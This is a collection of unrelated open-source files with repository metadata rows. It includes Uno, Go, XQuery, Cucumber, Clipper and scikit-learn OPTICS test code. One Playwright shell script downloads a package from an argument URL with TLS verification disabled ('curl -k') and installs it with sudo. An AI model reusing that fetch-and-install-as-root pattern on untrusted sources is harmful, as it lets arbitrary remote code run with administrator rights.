@{Uno.Int2} unoSize;
unoSize.X = $0.width * $1;
unoSize.Y = $0.height * $1;
return unoSize;
@}
public static extern uCGSize CGSizeFromUnoInt2(int2 unoSize, float scale)
@{
CGSize size;
size.width = $0.X / $1;
size.height = $0.Y / $1;
return size;
@}
public static extern uCGSize CGSizeFromUnoFloat2(float2 unoSize, float scale)
@{
CGSize size;
size.width = $0.X / $1;
size.height = $0.Y / $1;
return size;
@}
}
}
| Uno | 4 | helilabs/fuselibs | Source/Fuse.iOS/Support.uno | [
"MIT"
] |
Feature: hub delete
Background:
Given I am "andreasbaumann" on github.com with OAuth token "OTOKEN"
Scenario: No argument in current repo
Given I am in "git://github.com/github/hub.git" git repo
When I run `hub delete`
Then the exit status should be 1
And the stderr should contain exactly:
"""
Usage: hub delete [-y] [<ORGANIZATION>/]<NAME>\n
"""
Scenario: Successful confirmation
Given the GitHub API server:
"""
delete('/repos/andreasbaumann/my-repo') {
status 204
}
"""
When I run `hub delete my-repo` interactively
And I type "yes"
Then the exit status should be 0
And the output should contain:
"""
Really delete repository 'andreasbaumann/my-repo' (yes/N)?
"""
And the output should contain:
"""
Deleted repository 'andreasbaumann/my-repo'.
"""
Scenario: Org repo
Given the GitHub API server:
"""
delete('/repos/our-org/my-repo') {
status 204
}
"""
When I run `hub delete our-org/my-repo` interactively
And I type "yes"
Then the exit status should be 0
And the output should contain:
"""
Really delete repository 'our-org/my-repo' (yes/N)?
"""
And the output should contain:
"""
Deleted repository 'our-org/my-repo'.
"""
Scenario: Invalid confirmation
When I run `hub delete my-repo` interactively
And I type "y"
Then the exit status should be 1
And the output should contain:
"""
Really delete repository 'andreasbaumann/my-repo' (yes/N)?
"""
And the stderr should contain exactly:
"""
Please type 'yes' for confirmation.\n
"""
Scenario: HTTP 403
Given the GitHub API server:
"""
delete('/repos/andreasbaumann/my-repo') {
status 403
}
"""
When I run `hub delete -y my-repo`
Then the exit status should be 1
And the stderr should contain:
"""
Please edit the token used for hub at https://github.com/settings/tokens
and verify that the `delete_repo` scope is enabled.
"""
Scenario: HTTP 403 on GitHub Enterprise
Given I am "mislav" on git.my.org with OAuth token "FITOKEN"
And $GITHUB_HOST is "git.my.org"
Given the GitHub API server:
"""
delete('/api/v3/repos/mislav/my-repo', :host_name => 'git.my.org') {
status 403
}
"""
When I run `hub delete -y my-repo`
Then the exit status should be 1
And the stderr should contain:
"""
Please edit the token used for hub at https://git.my.org/settings/tokens
and verify that the `delete_repo` scope is enabled.
"""
| Cucumber | 4 | JLLeitschuh/hub | features/delete.feature | [
"MIT"
] |
/*---------------------------------------------------------------------------------------------
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See License.txt in the project root for license information.
*--------------------------------------------------------------------------------------------*/
import { ColorTheme, ColorThemeKind } from './extHostTypes';
import { IExtHostRpcService } from 'vs/workbench/api/common/extHostRpcService';
import { ExtHostThemingShape } from 'vs/workbench/api/common/extHost.protocol';
import { Emitter, Event } from 'vs/base/common/event';
export class ExtHostTheming implements ExtHostThemingShape {
readonly _serviceBrand: undefined;
private _actual: ColorTheme;
private _onDidChangeActiveColorTheme: Emitter<ColorTheme>;
constructor(
@IExtHostRpcService _extHostRpc: IExtHostRpcService
) {
this._actual = new ColorTheme(ColorThemeKind.Dark);
this._onDidChangeActiveColorTheme = new Emitter<ColorTheme>();
}
public get activeColorTheme(): ColorTheme {
return this._actual;
}
$onColorThemeChange(type: string): void {
let kind;
switch (type) {
case 'light': kind = ColorThemeKind.Light; break;
case 'hcDark': kind = ColorThemeKind.HighContrast; break;
case 'hcLight': kind = ColorThemeKind.HighContrastLight; break;
default:
kind = ColorThemeKind.Dark;
}
this._actual = new ColorTheme(kind);
this._onDidChangeActiveColorTheme.fire(this._actual);
}
public get onDidChangeActiveColorTheme(): Event<ColorTheme> {
return this._onDidChangeActiveColorTheme.event;
}
}
| TypeScript | 4 | KevinAo22/vscode | src/vs/workbench/api/common/extHostTheming.ts | [
"MIT"
] |
<!DOCTYPE html><html><head><title>Fortunes</title></head><body>{{ content() }}</body></html> | Volt | 3 | xsoheilalizadeh/FrameworkBenchmarks | frameworks/PHP/phalcon/app/views/layouts/mongobench.volt | [
"BSD-3-Clause"
] |
#!/bin/bash
set -e
set -x
cd /tmp
curl -o ./msedge_dev.pkg -k "$1"
# Note: there's no way to uninstall previously installed MSEdge.
# However, running PKG again seems to update installation.
sudo installer -pkg /tmp/msedge_dev.pkg -target /
rm -rf /tmp/msedge_dev.pkg
/Applications/Microsoft\ Edge\ Dev.app/Contents/MacOS/Microsoft\ Edge\ Dev --version
| Shell | 3 | burner/playwright | packages/playwright-core/bin/reinstall_msedge_dev_mac.sh | [
"Apache-2.0"
] |
# Create document.
POST http://localhost:7301/documents
Content-Type: application/json
{
"documentId": "document-1",
"title": "Document 1",
"body": "john@gmail.com"
}
###
# Approve document.
POST http://localhost:7301/documents/document-1/approve
Content-Type: application/json
{
"author": "Jason",
"text": "Great job!",
"timeStamp": "2020-10-31T20:56:49Z"
}
###
# Reject document.
POST http://localhost:7301/documents/document-1/reject
Content-Type: application/json
{
"author": "Laura",
"text": "Nice try.",
"timeStamp": "2020-11-01T20:20:20Z"
}
| HTTP | 4 | tomy2105/elsa-core | src/samples/aspnet/Elsa.Samples.ContextualWorkflowHttp/workflows.http | [
"MIT"
] |
// Copyright 2018 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package net
import (
"internal/poll"
"io"
)
// splice transfers data from r to c using the splice system call to minimize
// copies from and to userspace. c must be a TCP connection. Currently, splice
// is only enabled if r is a TCP or a stream-oriented Unix connection.
//
// If splice returns handled == false, it has performed no work.
func splice(c *netFD, r io.Reader) (written int64, err error, handled bool) {
var remain int64 = 1 << 62 // by default, copy until EOF
lr, ok := r.(*io.LimitedReader)
if ok {
remain, r = lr.N, lr.R
if remain <= 0 {
return 0, nil, true
}
}
var s *netFD
if tc, ok := r.(*TCPConn); ok {
s = tc.fd
} else if uc, ok := r.(*UnixConn); ok {
if uc.fd.net != "unix" {
return 0, nil, false
}
s = uc.fd
} else {
return 0, nil, false
}
written, handled, sc, err := poll.Splice(&c.pfd, &s.pfd, remain)
if lr != nil {
lr.N -= written
}
return written, wrapSyscallError(sc, err), handled
}
| Go | 4 | Havoc-OS/androidprebuilts_go_linux-x86 | src/net/splice_linux.go | [
"BSD-3-Clause"
] |
module namespace m="de/bottlecaps/railroad/xq/xhtml-to-md.xq";
declare namespace svg="http://www.w3.org/2000/svg";
declare namespace xhtml="http://www.w3.org/1999/xhtml";
declare namespace xlink="http://www.w3.org/1999/xlink";
declare namespace xsl="http://www.w3.org/1999/XSL/Transform";
declare option saxon:output "method=text";
declare variable $m:serialization-options :=
<output:serialization-parameters xmlns:output="http://www.w3.org/2010/xslt-xquery-serialization">
</output:serialization-parameters>;
declare function m:rewrite($nodes, $format, $referenced-by as xs:boolean)
{
for $node in $nodes
return
typeswitch ($node)
case document-node() return
m:rewrite($node/node(), $format, $referenced-by)
case element(svg:svg) return
if (empty($node/ancestor::xhtml:body)) then
()
else
let $name := $node/preceding::xhtml:p[1]/(.//xhtml:a, following::xhtml:a)[1]/@name
let $name :=
if ($name) then
$name
else
string(count($node/preceding::svg:svg) + 1)
let $ebnf := string-join($node/following::xhtml:div[@class="ebnf"][1]/xhtml:code/*, "
")
let $img := concat("), ")")
return
if (empty($node/following::svg:svg)) then
(
"## 
",
$img,
" <sup>generated by [RR - Railroad Diagram Generator][RR]</sup>
",
"
",
"[RR]: http://bottlecaps.de/rr/ui"
)
else
(
"**", string($name), ":**

",
$img,
"

",
if ($ebnf[.]) then
(
"```
",
$ebnf,
"
```

"
)
else
(),
let $referenced-by-links :=
if ($node/following-sibling::xhtml:p[1]/xhtml:div/@class = "ebnf") then
$node/following-sibling::xhtml:p[2]//xhtml:li/xhtml:a
else
$node/following-sibling::xhtml:p[1]//xhtml:li/xhtml:a
where exists($referenced-by-links)
return
(
"referenced by:

",
for $a in $referenced-by-links
return ("* ", data($a/@title), "
"),
"
"
)
)
case element() return
m:rewrite($node/node(), $format, $referenced-by)
default return
()
};
declare function m:transform($input as node()*) as xs:string
{
string-join(m:rewrite($input, "png", false()), "")
};
| XQuery | 4 | bannmann/rr | src/main/resources/de/bottlecaps/railroad/xq/xhtml-to-md.xq | [
"Apache-2.0"
] |
module Main
triples : Int -> List (Int, Int, Int)
triples top = [(x,y,z) | z<-[1..top], y<-[1..z], x<-[1..y],
x * x + y * y == z * z ]
main : IO ()
main = do putStrLn "Max: "
max <- getLine
printLn (triples (cast max))
| Idris | 3 | ska80/idris-jvm | benchmark/benchmarks/triples/triples.idr | [
"BSD-3-Clause"
] |
|s|{s print;s inspect println}call:"|s|{s print;s inspect println}call:"
| Fancy | 0 | MakeNowJust/quine | quine.fy | [
"Beerware"
] |
/*
* Copyright 2013 The Sculptor Project Team, including the original
* author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.sculptor.generator.template.rest
import javax.inject.Inject
import org.sculptor.generator.chain.ChainOverridable
import org.sculptor.generator.ext.Helper
import org.sculptor.generator.util.OutputSlot
import sculptormetamodel.Application
@ChainOverridable
class RestWebCssTmpl {
@Inject extension Helper helper
def String css(Application it) {
fileOutput("stylesheets/main.css", OutputSlot.TO_WEBROOT, '''
/* main elements */
body,div,td {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
color: #000;
}
body {
background-color: #fff;
background-position: top center;
background-repeat: no-repeat;
text-align: center;
min-width: 800px;
margin-top: 60px;
margin-left: auto;
margin-right: auto;
}
.formContainer {
height:400px;
}
label {
width:100px;
float:left;
margin-left: 5px;
margin-top: 0px;
}
input {
height:16px;
}
submit {
height:25px;
}
div {
text-align: left;
}
div .box {
display:block;
margin-left:105px;
}
/* header and footer elements */
#wrap {
margin:0 auto;
position:relative;
float:center;
top: 0px;
left:0px;
width:750px;
text-align:left;
}
#main {
margin:0 auto;
position:relative;
float:right;
top: 35px;
left:0px;
width:700px;
height:700px;
text-align:left;
}
.footer {
background:#fff;
border:none;
margin-top:20px;
border-top:1px solid #999999;
width:100%;
}
.footer td {color:#999999;}
.footer a:link {color: #7db223;}
/* menu elements*/
a.menu, a.menu:link, a.menu:visited {display:block; width:150px; height:25px;}
/* text styles */
h1,h2,h3 {
font-family: Helvetica, sans-serif;
color: #ae8658;
}
h1 {
font-size: 20px;
line-height: 26px;
}
h2 {
font-size: 18px;
line-height: 20px;
}
h3 {
font-size: 15px;
line-height: 21px;
color:#555;
}
h4 {
font-size: 14px;
line-height: 20px;
}
.errors {
color: red;
font-weight: bold;
display: block;
margin-left: 105px;
}
a {
text-decoration: underline;
font-size: 13px;
}
a:link {
color: #ae8658;
}
a:hover {
color: #456314;
}
a:active {
color: #ae8658;
}
a:visited {
color: #ae8658;
}
ul {
list-style: disc url(../images/bullet-arrow.png);
}
li {
padding-top: 5px;
text-align: left;
}
li ul {
list-style: square url(images/sub-bullet.gif);
}
li ul li ul {
list-style: circle none;
}
/* table elements */
table {
background: #EEEEEE;
margin: 2px 0 0 0;
border: 1px solid #BBBBBB;
border-collapse: collapse;
}
table table {
margin: -5px 0;
border: 0px solid #e0e7d3;
width: 100%;
}
table td,table th {
padding: 5px;
}
table th {
font-size: 11px;
text-align: left;
font-weight: bold;
color: #FFFFFF;
}
table thead {
font-weight: bold;
font-style: italic;
background-color: #BBBBBB;
}
table a:link {color: #303030;}
caption {
caption-side: top;
width: auto;
text-align: left;
font-size: 12px;
color: #848f73;
padding-bottom: 4px;
}
fieldset {
background: #e0e7d3;
padding: 8px;
padding-bottom: 22px;
border: none;
width: 560px;
}
fieldset label {
width: 70px;
float: left;
margin-top: 1.7em;
margin-left: 20px;
}
fieldset textfield {
margin: 3px;
height: 20px;
background: #e0e7d3;
}
fieldset textarea {
margin: 3px;
height: 165px;
background: #e0e7d3;
}
fieldset input {
margin: 3px;
height: 20px;
background: #e0e7d3;
}
fieldset table {
width: 100%;
}
fieldset th {
padding-left: 25px;
}
.table-buttons {
background-color:#fff;
border:none;
}
.table-buttons td {
border:none;
}
.submit input {
border: 1px solid #BBBBBB;
color:#777777;
padding:2px 7px;
font-size:11px;
text-transform:uppercase;
font-weight:bold;
height:24px;
}
.updated {
background:#ecf1e5;
font-size:11px;
margin-left:2px;
border:4px solid #ecf1e5;
}
.updated td {
padding:2px 8px;
font-size:11px;
color:#888888;
}
#menu {
background: #eee;
position:relative;
float:left;
top: 35px;
left:0px;
width:200px;
}
#menu ul{
list-style: none;
margin: 0;
padding: 0;
}
#menu ul li{
padding: 0px;
}
#menu a, #menu h2 {
display: block;
margin: 0;
padding: 2px 6px;
color:#FFFFFF;
}
#menu h2 {
color: #fff;
background: #648C1D;
text-transform: uppercase;
font-weight:bold;
font-size: 1em;
}
#menu a {
color: #666666;
background: #efefef;
text-decoration: none;
padding: 2px 12px;
}
#menu a:hover {
color: #648C1D;
background: #fff;
}
'''
)
}
}
| Xtend | 4 | sculptor/sculptor | sculptor-generator/sculptor-generator-templates/src/main/java/org/sculptor/generator/template/rest/RestWebCssTmpl.xtend | [
"Apache-2.0"
] |
SequenceBitTest := UnitTest clone do(
testBitsWithinFirstByte := method(
assertEquals(1, 1 asCharacter bitAt(0))
assertEquals(0, 2 asCharacter bitAt(0))
assertEquals(1, 2 asCharacter bitAt(1))
for(i, 0, 7, assertEquals(0, 0 asCharacter bitAt(i)))
for(i, 0, 7, assertEquals(1, 0xff asCharacter bitAt(i)))
)
testBitsWithinSecondByte := method(
assertEquals(1, ("\0" .. 1 asCharacter) bitAt(8 + 0))
assertEquals(0, ("\0" .. 2 asCharacter) bitAt(8 + 0))
assertEquals(1, ("\0" .. 2 asCharacter) bitAt(8 + 1))
for(i, 0, 7, assertEquals(0, ("\0" .. 0 asCharacter) bitAt(8 + i)))
for(i, 0, 7, assertEquals(1, ("\0" .. 0xff asCharacter) bitAt(8 + i)))
)
byteList := method(s,
l := list()
s sizeInBytes repeat(i,
l append(s byteAt(i))
)
l
)
testByteAtByteItemType := method(
assertEquals(list(97, 98, 99, 100), byteList("abcd"))
)
testByteAtTwoByteItemType := method(
assertEquals(list(97, 98, 99, 100), byteList("abcd" asMutable setItemType("uint16")))
)
)
| Io | 4 | akluth/io | libs/iovm/tests/correctness/SequenceBitTest.io | [
"BSD-3-Clause"
] |
/* Copyright 2016 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_CORE_DISTRIBUTED_RUNTIME_RPC_GRPC_CLIENT_CQ_TAG_H_
#define TENSORFLOW_CORE_DISTRIBUTED_RUNTIME_RPC_GRPC_CLIENT_CQ_TAG_H_
#include "grpcpp/grpcpp.h"
#include "tensorflow/core/distributed_runtime/rpc/grpc_util.h"
#include "tensorflow/core/lib/core/status.h"
#include "tensorflow/core/platform/macros.h"
namespace tensorflow {
// Represents a pending asynchronous client call as a tag that can be
// stored in a `grpc::CompletionQueue`.
class GrpcClientCQTag {
public:
GrpcClientCQTag() {}
virtual ~GrpcClientCQTag() {}
// OnCompleted is invoked when the RPC has finished.
// Implementations of OnCompleted can delete *this.
virtual void OnCompleted(bool ok) = 0;
private:
TF_DISALLOW_COPY_AND_ASSIGN(GrpcClientCQTag);
};
} // namespace tensorflow
#endif // TENSORFLOW_CORE_DISTRIBUTED_RUNTIME_RPC_GRPC_CLIENT_CQ_TAG_H_
| C | 4 | abhaikollara/tensorflow | tensorflow/core/distributed_runtime/rpc/grpc_client_cq_tag.h | [
"Apache-2.0"
] |
#include <opencv2/core.hpp>
#include <opencv2/videoio.hpp>
#include <opencv2/highgui.hpp>
#include <iostream>
using namespace cv;
using namespace std;
int main(int, char**)
{
Mat frame;
vector<Mat> audioData;
VideoCapture cap;
vector<int> params { CAP_PROP_AUDIO_STREAM, 0,
CAP_PROP_VIDEO_STREAM, -1 };
cap.open(0, CAP_MSMF, params);
if (!cap.isOpened())
{
cerr << "ERROR! Can't to open microphone" << endl;
return -1;
}
const int audioBaseIndex = (int)cap.get(CAP_PROP_AUDIO_BASE_INDEX);
const int numberOfChannels = (int)cap.get(CAP_PROP_AUDIO_TOTAL_CHANNELS);
cout << "CAP_PROP_AUDIO_DATA_DEPTH: " << depthToString((int)cap.get(CAP_PROP_AUDIO_DATA_DEPTH)) << endl;
cout << "CAP_PROP_AUDIO_SAMPLES_PER_SECOND: " << cap.get(CAP_PROP_AUDIO_SAMPLES_PER_SECOND) << endl;
cout << "CAP_PROP_AUDIO_TOTAL_CHANNELS: " << numberOfChannels << endl;
cout << "CAP_PROP_AUDIO_TOTAL_STREAMS: " << cap.get(CAP_PROP_AUDIO_TOTAL_STREAMS) << endl;
const double cvTickFreq = getTickFrequency();
int64 sysTimeCurr = getTickCount();
int64 sysTimePrev = sysTimeCurr;
while ((sysTimeCurr-sysTimePrev)/cvTickFreq < 10)
{
if (cap.grab())
{
for (int nCh = 0; nCh < numberOfChannels; nCh++)
{
cap.retrieve(frame, audioBaseIndex+nCh);
audioData.push_back(frame);
sysTimeCurr = getTickCount();
}
}
else
{
cerr << "Grab error" << endl;
break;
}
}
int numberOfSamles = 0;
for (auto item : audioData)
numberOfSamles+=item.cols;
cout << "Number of samples: " << numberOfSamles << endl;
return 0;
}
| C++ | 3 | nowireless/opencv | samples/cpp/videocapture_microphone.cpp | [
"Apache-2.0"
] |
#!/bin/sh
echo "Set exit on simple errors"
set -e
echo "Use dumb gradle terminal"
export TERM=dumb
rm -rf dist/package/platforms/android || true
mkdir -p dist/package/platforms/android
echo "Build android"
cd android
./gradlew --quiet assembleRelease
cd ..
cp android/widgets/build/outputs/aar/widgets-release.aar dist/package/platforms/android/widgets-release.aar
if [ "$1" ]
then
echo "Suffix package.json's version with tag: $1"
sed -i.bak 's/\(\"version\"\:[[:space:]]*\"[^\"]*\)\"/\1-'$1'"/g' ./dist/package/package.json
fi
if [ "$SKIP_PACK" ]
then
echo "SKIP pack"
else
echo "Copy NPM artefacts"
cp .npmignore LICENSE README.md package.json dist/package
echo "NPM pack"
cd dist/package
PACKAGE="$(npm pack)"
cd ../..
mv dist/package/$PACKAGE dist/$PACKAGE
echo "Output: dist/$PACKAGE"
fi | Shell | 4 | wiltonlazary/NativeScript | tns-core-modules-widgets/build.android.sh | [
"Apache-2.0"
] |
// Test file to test kate's clipper highlighting
// kate: hl Clipper;
//BEGIN INCLUDES
#include <clip-ui.ch>
#include "logo.ch"
#define PRGVERSION "0.0.1"
//END
//BEGIN CODE
static ws, win
static driver := getDriver()
/* a multiline
comment
*/
function main( formName )
local form
local fileName
if empty(formName)
?? "Usage: ./form_ui <form.xfl>&\n"
CANCEL
else
fileName := formName
endif
ws := UIWorkSpace()
form := UIForm( fileName )
win := form:parseFile()
// ?? valtype(win),chr(10)
if win == NIL
CANCEL
endif
win:show()
ws:run()
ws:quit()
return 0
/* Setting dialog */
function settingsDialog()
?? "TODO: Settings dialog&\n"
return
/* About dialog */
function aboutDialog()
local dlg := UIWindow("About", win, "aboutDlg", .F.)
local hl, lside, t, bb, bD
hl := UIHBox(,4,8)
lside := UIVBox()
lside:add(UIImage(eas_logo_mini,.T.))
hl:add(lside,.F.,.F.)
dlg:userSpace:add(hl,.T.,.T.)
t := UIVBox()
hl:add(t,.T.,.T.)
t:add(UILabel("License: GPL version 2 or later"))
bb := UIButtonBar()
t:add(bb)
bD := UIButton(win, "&Close", {|o,e| dlg:close() } )
bb:add( bD )
dlg:setFocus(bD)
dlg:setDefault(bD)
dlg:setPlacement( .T. )
dlg:show()
return
//END | xBase | 5 | dawidsowa/syntax-highlighting | autotests/input/highlight.prg | [
"MIT"
] |
#ifndef TEST_INTEROP_C_MODULES_PRINT_QUALIFIED_CLANG_TYPES_INPUTS_FOREIGN_A_H
#define TEST_INTEROP_C_MODULES_PRINT_QUALIFIED_CLANG_TYPES_INPUTS_FOREIGN_A_H
#include "textual-header.h"
#endif // TEST_INTEROP_C_MODULES_PRINT_QUALIFIED_CLANG_TYPES_INPUTS_FOREIGN_A_H
| C | 2 | gandhi56/swift | test/Interop/C/modules/print-qualified-clang-types/Inputs/foreign-a.h | [
"Apache-2.0"
] |
# Authors: Shane Grigsby <refuge@rocktalus.com>
# Adrin Jalali <adrin.jalali@gmail.com>
# License: BSD 3 clause
import numpy as np
import pytest
from sklearn.datasets import make_blobs
from sklearn.cluster import OPTICS
from sklearn.cluster._optics import _extend_region, _extract_xi_labels
from sklearn.exceptions import DataConversionWarning
from sklearn.metrics.cluster import contingency_matrix
from sklearn.metrics.pairwise import pairwise_distances
from sklearn.cluster import DBSCAN
from sklearn.utils import shuffle
from sklearn.utils._testing import assert_array_equal
from sklearn.utils._testing import assert_allclose
from sklearn.cluster.tests.common import generate_clustered_data
rng = np.random.RandomState(0)
n_points_per_cluster = 10
C1 = [-5, -2] + 0.8 * rng.randn(n_points_per_cluster, 2)
C2 = [4, -1] + 0.1 * rng.randn(n_points_per_cluster, 2)
C3 = [1, -2] + 0.2 * rng.randn(n_points_per_cluster, 2)
C4 = [-2, 3] + 0.3 * rng.randn(n_points_per_cluster, 2)
C5 = [3, -2] + 1.6 * rng.randn(n_points_per_cluster, 2)
C6 = [5, 6] + 2 * rng.randn(n_points_per_cluster, 2)
X = np.vstack((C1, C2, C3, C4, C5, C6))
@pytest.mark.parametrize(
("r_plot", "end"),
[
[[10, 8.9, 8.8, 8.7, 7, 10], 3],
[[10, 8.9, 8.8, 8.7, 8.6, 7, 10], 0],
[[10, 8.9, 8.8, 8.7, 7, 6, np.inf], 4],
[[10, 8.9, 8.8, 8.7, 7, 6, np.inf], 4],
],
)
def test_extend_downward(r_plot, end):
r_plot = np.array(r_plot)
ratio = r_plot[:-1] / r_plot[1:]
steep_downward = ratio >= 1 / 0.9
upward = ratio < 1
e = _extend_region(steep_downward, upward, 0, 2)
assert e == end
@pytest.mark.parametrize(
("r_plot", "end"),
[
[[1, 2, 2.1, 2.2, 4, 8, 8, np.inf], 6],
[[1, 2, 2.1, 2.2, 2.3, 4, 8, 8, np.inf], 0],
[[1, 2, 2.1, 2, np.inf], 0],
[[1, 2, 2.1, np.inf], 2],
],
)
def test_extend_upward(r_plot, end):
r_plot = np.array(r_plot)
ratio = r_plot[:-1] / r_plot[1:]
steep_upward = ratio <= 0.9
downward = ratio > 1
e = _extend_region(steep_upward, downward, 0, 2)
assert e == end
@pytest.mark.parametrize(
("ordering", "clusters", "expected"),
[
[[0, 1, 2, 3], [[0, 1], [2, 3]], [0, 0, 1, 1]],
[[0, 1, 2, 3], [[0, 1], [3, 3]], [0, 0, -1, 1]],
[[0, 1, 2, 3], [[0, 1], [3, 3], [0, 3]], [0, 0, -1, 1]],
[[3, 1, 2, 0], [[0, 1], [3, 3], [0, 3]], [1, 0, -1, 0]],
],
)
def test_the_extract_xi_labels(ordering, clusters, expected):
labels = _extract_xi_labels(ordering, clusters)
assert_array_equal(labels, expected)
def test_extract_xi():
# small and easy test (no clusters around other clusters)
# but with a clear noise data.
rng = np.random.RandomState(0)
n_points_per_cluster = 5
C1 = [-5, -2] + 0.8 * rng.randn(n_points_per_cluster, 2)
C2 = [4, -1] + 0.1 * rng.randn(n_points_per_cluster, 2)
C3 = [1, -2] + 0.2 * rng.randn(n_points_per_cluster, 2)
C4 = [-2, 3] + 0.3 * rng.randn(n_points_per_cluster, 2)
C5 = [3, -2] + 0.6 * rng.randn(n_points_per_cluster, 2)
C6 = [5, 6] + 0.2 * rng.randn(n_points_per_cluster, 2)
X = np.vstack((C1, C2, C3, C4, C5, np.array([[100, 100]]), C6))
expected_labels = np.r_[[2] * 5, [0] * 5, [1] * 5, [3] * 5, [1] * 5, -1, [4] * 5]
X, expected_labels = shuffle(X, expected_labels, random_state=rng)
clust = OPTICS(
min_samples=3, min_cluster_size=2, max_eps=20, cluster_method="xi", xi=0.4
).fit(X)
assert_array_equal(clust.labels_, expected_labels)
# check float min_samples and min_cluster_size
clust = OPTICS(
min_samples=0.1, min_cluster_size=0.08, max_eps=20, cluster_method="xi", xi=0.4
).fit(X)
assert_array_equal(clust.labels_, expected_labels)
X = np.vstack((C1, C2, C3, C4, C5, np.array([[100, 100]] * 2), C6))
expected_labels = np.r_[
[1] * 5, [3] * 5, [2] * 5, [0] * 5, [2] * 5, -1, -1, [4] * 5
]
X, expected_labels = shuffle(X, expected_labels, random_state=rng)
clust = OPTICS(
min_samples=3, min_cluster_size=3, max_eps=20, cluster_method="xi", xi=0.3
).fit(X)
# this may fail if the predecessor correction is not at work!
assert_array_equal(clust.labels_, expected_labels)
C1 = [[0, 0], [0, 0.1], [0, -0.1], [0.1, 0]]
C2 = [[10, 10], [10, 9], [10, 11], [9, 10]]
C3 = [[100, 100], [100, 90], [100, 110], [90, 100]]
X = np.vstack((C1, C2, C3))
expected_labels = np.r_[[0] * 4, [1] * 4, [2] * 4]
X, expected_labels = shuffle(X, expected_labels, random_state=rng)
clust = OPTICS(
min_samples=2, min_cluster_size=2, max_eps=np.inf, cluster_method="xi", xi=0.04
).fit(X)
assert_array_equal(clust.labels_, expected_labels)
def test_cluster_hierarchy_():
rng = np.random.RandomState(0)
n_points_per_cluster = 100
C1 = [0, 0] + 2 * rng.randn(n_points_per_cluster, 2)
C2 = [0, 0] + 50 * rng.randn(n_points_per_cluster, 2)
X = np.vstack((C1, C2))
X = shuffle(X, random_state=0)
clusters = OPTICS(min_samples=20, xi=0.1).fit(X).cluster_hierarchy_
assert clusters.shape == (2, 2)
diff = np.sum(clusters - np.array([[0, 99], [0, 199]]))
assert diff / len(X) < 0.05
def test_correct_number_of_clusters():
# in 'auto' mode
n_clusters = 3
X = generate_clustered_data(n_clusters=n_clusters)
# Parameters chosen specifically for this task.
# Compute OPTICS
clust = OPTICS(max_eps=5.0 * 6.0, min_samples=4, xi=0.1)
clust.fit(X)
# number of clusters, ignoring noise if present
n_clusters_1 = len(set(clust.labels_)) - int(-1 in clust.labels_)
assert n_clusters_1 == n_clusters
# check attribute types and sizes
assert clust.labels_.shape == (len(X),)
assert clust.labels_.dtype.kind == "i"
assert clust.reachability_.shape == (len(X),)
assert clust.reachability_.dtype.kind == "f"
assert clust.core_distances_.shape == (len(X),)
assert clust.core_distances_.dtype.kind == "f"
assert clust.ordering_.shape == (len(X),)
assert clust.ordering_.dtype.kind == "i"
assert set(clust.ordering_) == set(range(len(X)))
def test_minimum_number_of_sample_check():
# test that we check a minimum number of samples
msg = "min_samples must be no greater than"
# Compute OPTICS
X = [[1, 1]]
clust = OPTICS(max_eps=5.0 * 0.3, min_samples=10, min_cluster_size=1)
# Run the fit
with pytest.raises(ValueError, match=msg):
clust.fit(X)
def test_bad_extract():
# Test an extraction of eps too close to original eps
msg = "Specify an epsilon smaller than 0.15. Got 0.3."
centers = [[1, 1], [-1, -1], [1, -1]]
X, labels_true = make_blobs(
n_samples=750, centers=centers, cluster_std=0.4, random_state=0
)
# Compute OPTICS
clust = OPTICS(max_eps=5.0 * 0.03, cluster_method="dbscan", eps=0.3, min_samples=10)
with pytest.raises(ValueError, match=msg):
clust.fit(X)
def test_bad_reachability():
msg = "All reachability values are inf. Set a larger max_eps."
centers = [[1, 1], [-1, -1], [1, -1]]
X, labels_true = make_blobs(
n_samples=750, centers=centers, cluster_std=0.4, random_state=0
)
with pytest.warns(UserWarning, match=msg):
clust = OPTICS(max_eps=5.0 * 0.003, min_samples=10, eps=0.015)
clust.fit(X)
def test_nowarn_if_metric_bool_data_bool():
# make sure no warning is raised if metric and data are both boolean
# non-regression test for
# https://github.com/scikit-learn/scikit-learn/issues/18996
pairwise_metric = "rogerstanimoto"
X = np.random.randint(2, size=(5, 2), dtype=bool)
with pytest.warns(None) as warn_record:
OPTICS(metric=pairwise_metric).fit(X)
assert len(warn_record) == 0
def test_warn_if_metric_bool_data_no_bool():
# make sure a *single* conversion warning is raised if metric is boolean
# but data isn't
# non-regression test for
# https://github.com/scikit-learn/scikit-learn/issues/18996
pairwise_metric = "rogerstanimoto"
X = np.random.randint(2, size=(5, 2), dtype=np.int32)
msg = f"Data will be converted to boolean for metric {pairwise_metric}"
with pytest.warns(DataConversionWarning, match=msg) as warn_record:
OPTICS(metric=pairwise_metric).fit(X)
assert len(warn_record) == 1
def test_nowarn_if_metric_no_bool():
# make sure no conversion warning is raised if
# metric isn't boolean, no matter what the data type is
pairwise_metric = "minkowski"
X_bool = np.random.randint(2, size=(5, 2), dtype=bool)
X_num = np.random.randint(2, size=(5, 2), dtype=np.int32)
with pytest.warns(None) as warn_record:
# fit boolean data
OPTICS(metric=pairwise_metric).fit(X_bool)
# fit numeric data
OPTICS(metric=pairwise_metric).fit(X_num)
assert len(warn_record) == 0
def test_close_extract():
# Test extract where extraction eps is close to scaled max_eps
centers = [[1, 1], [-1, -1], [1, -1]]
X, labels_true = make_blobs(
n_samples=750, centers=centers, cluster_std=0.4, random_state=0
)
# Compute OPTICS
clust = OPTICS(max_eps=1.0, cluster_method="dbscan", eps=0.3, min_samples=10).fit(X)
# Cluster ordering starts at 0; max cluster label = 2 is 3 clusters
assert max(clust.labels_) == 2
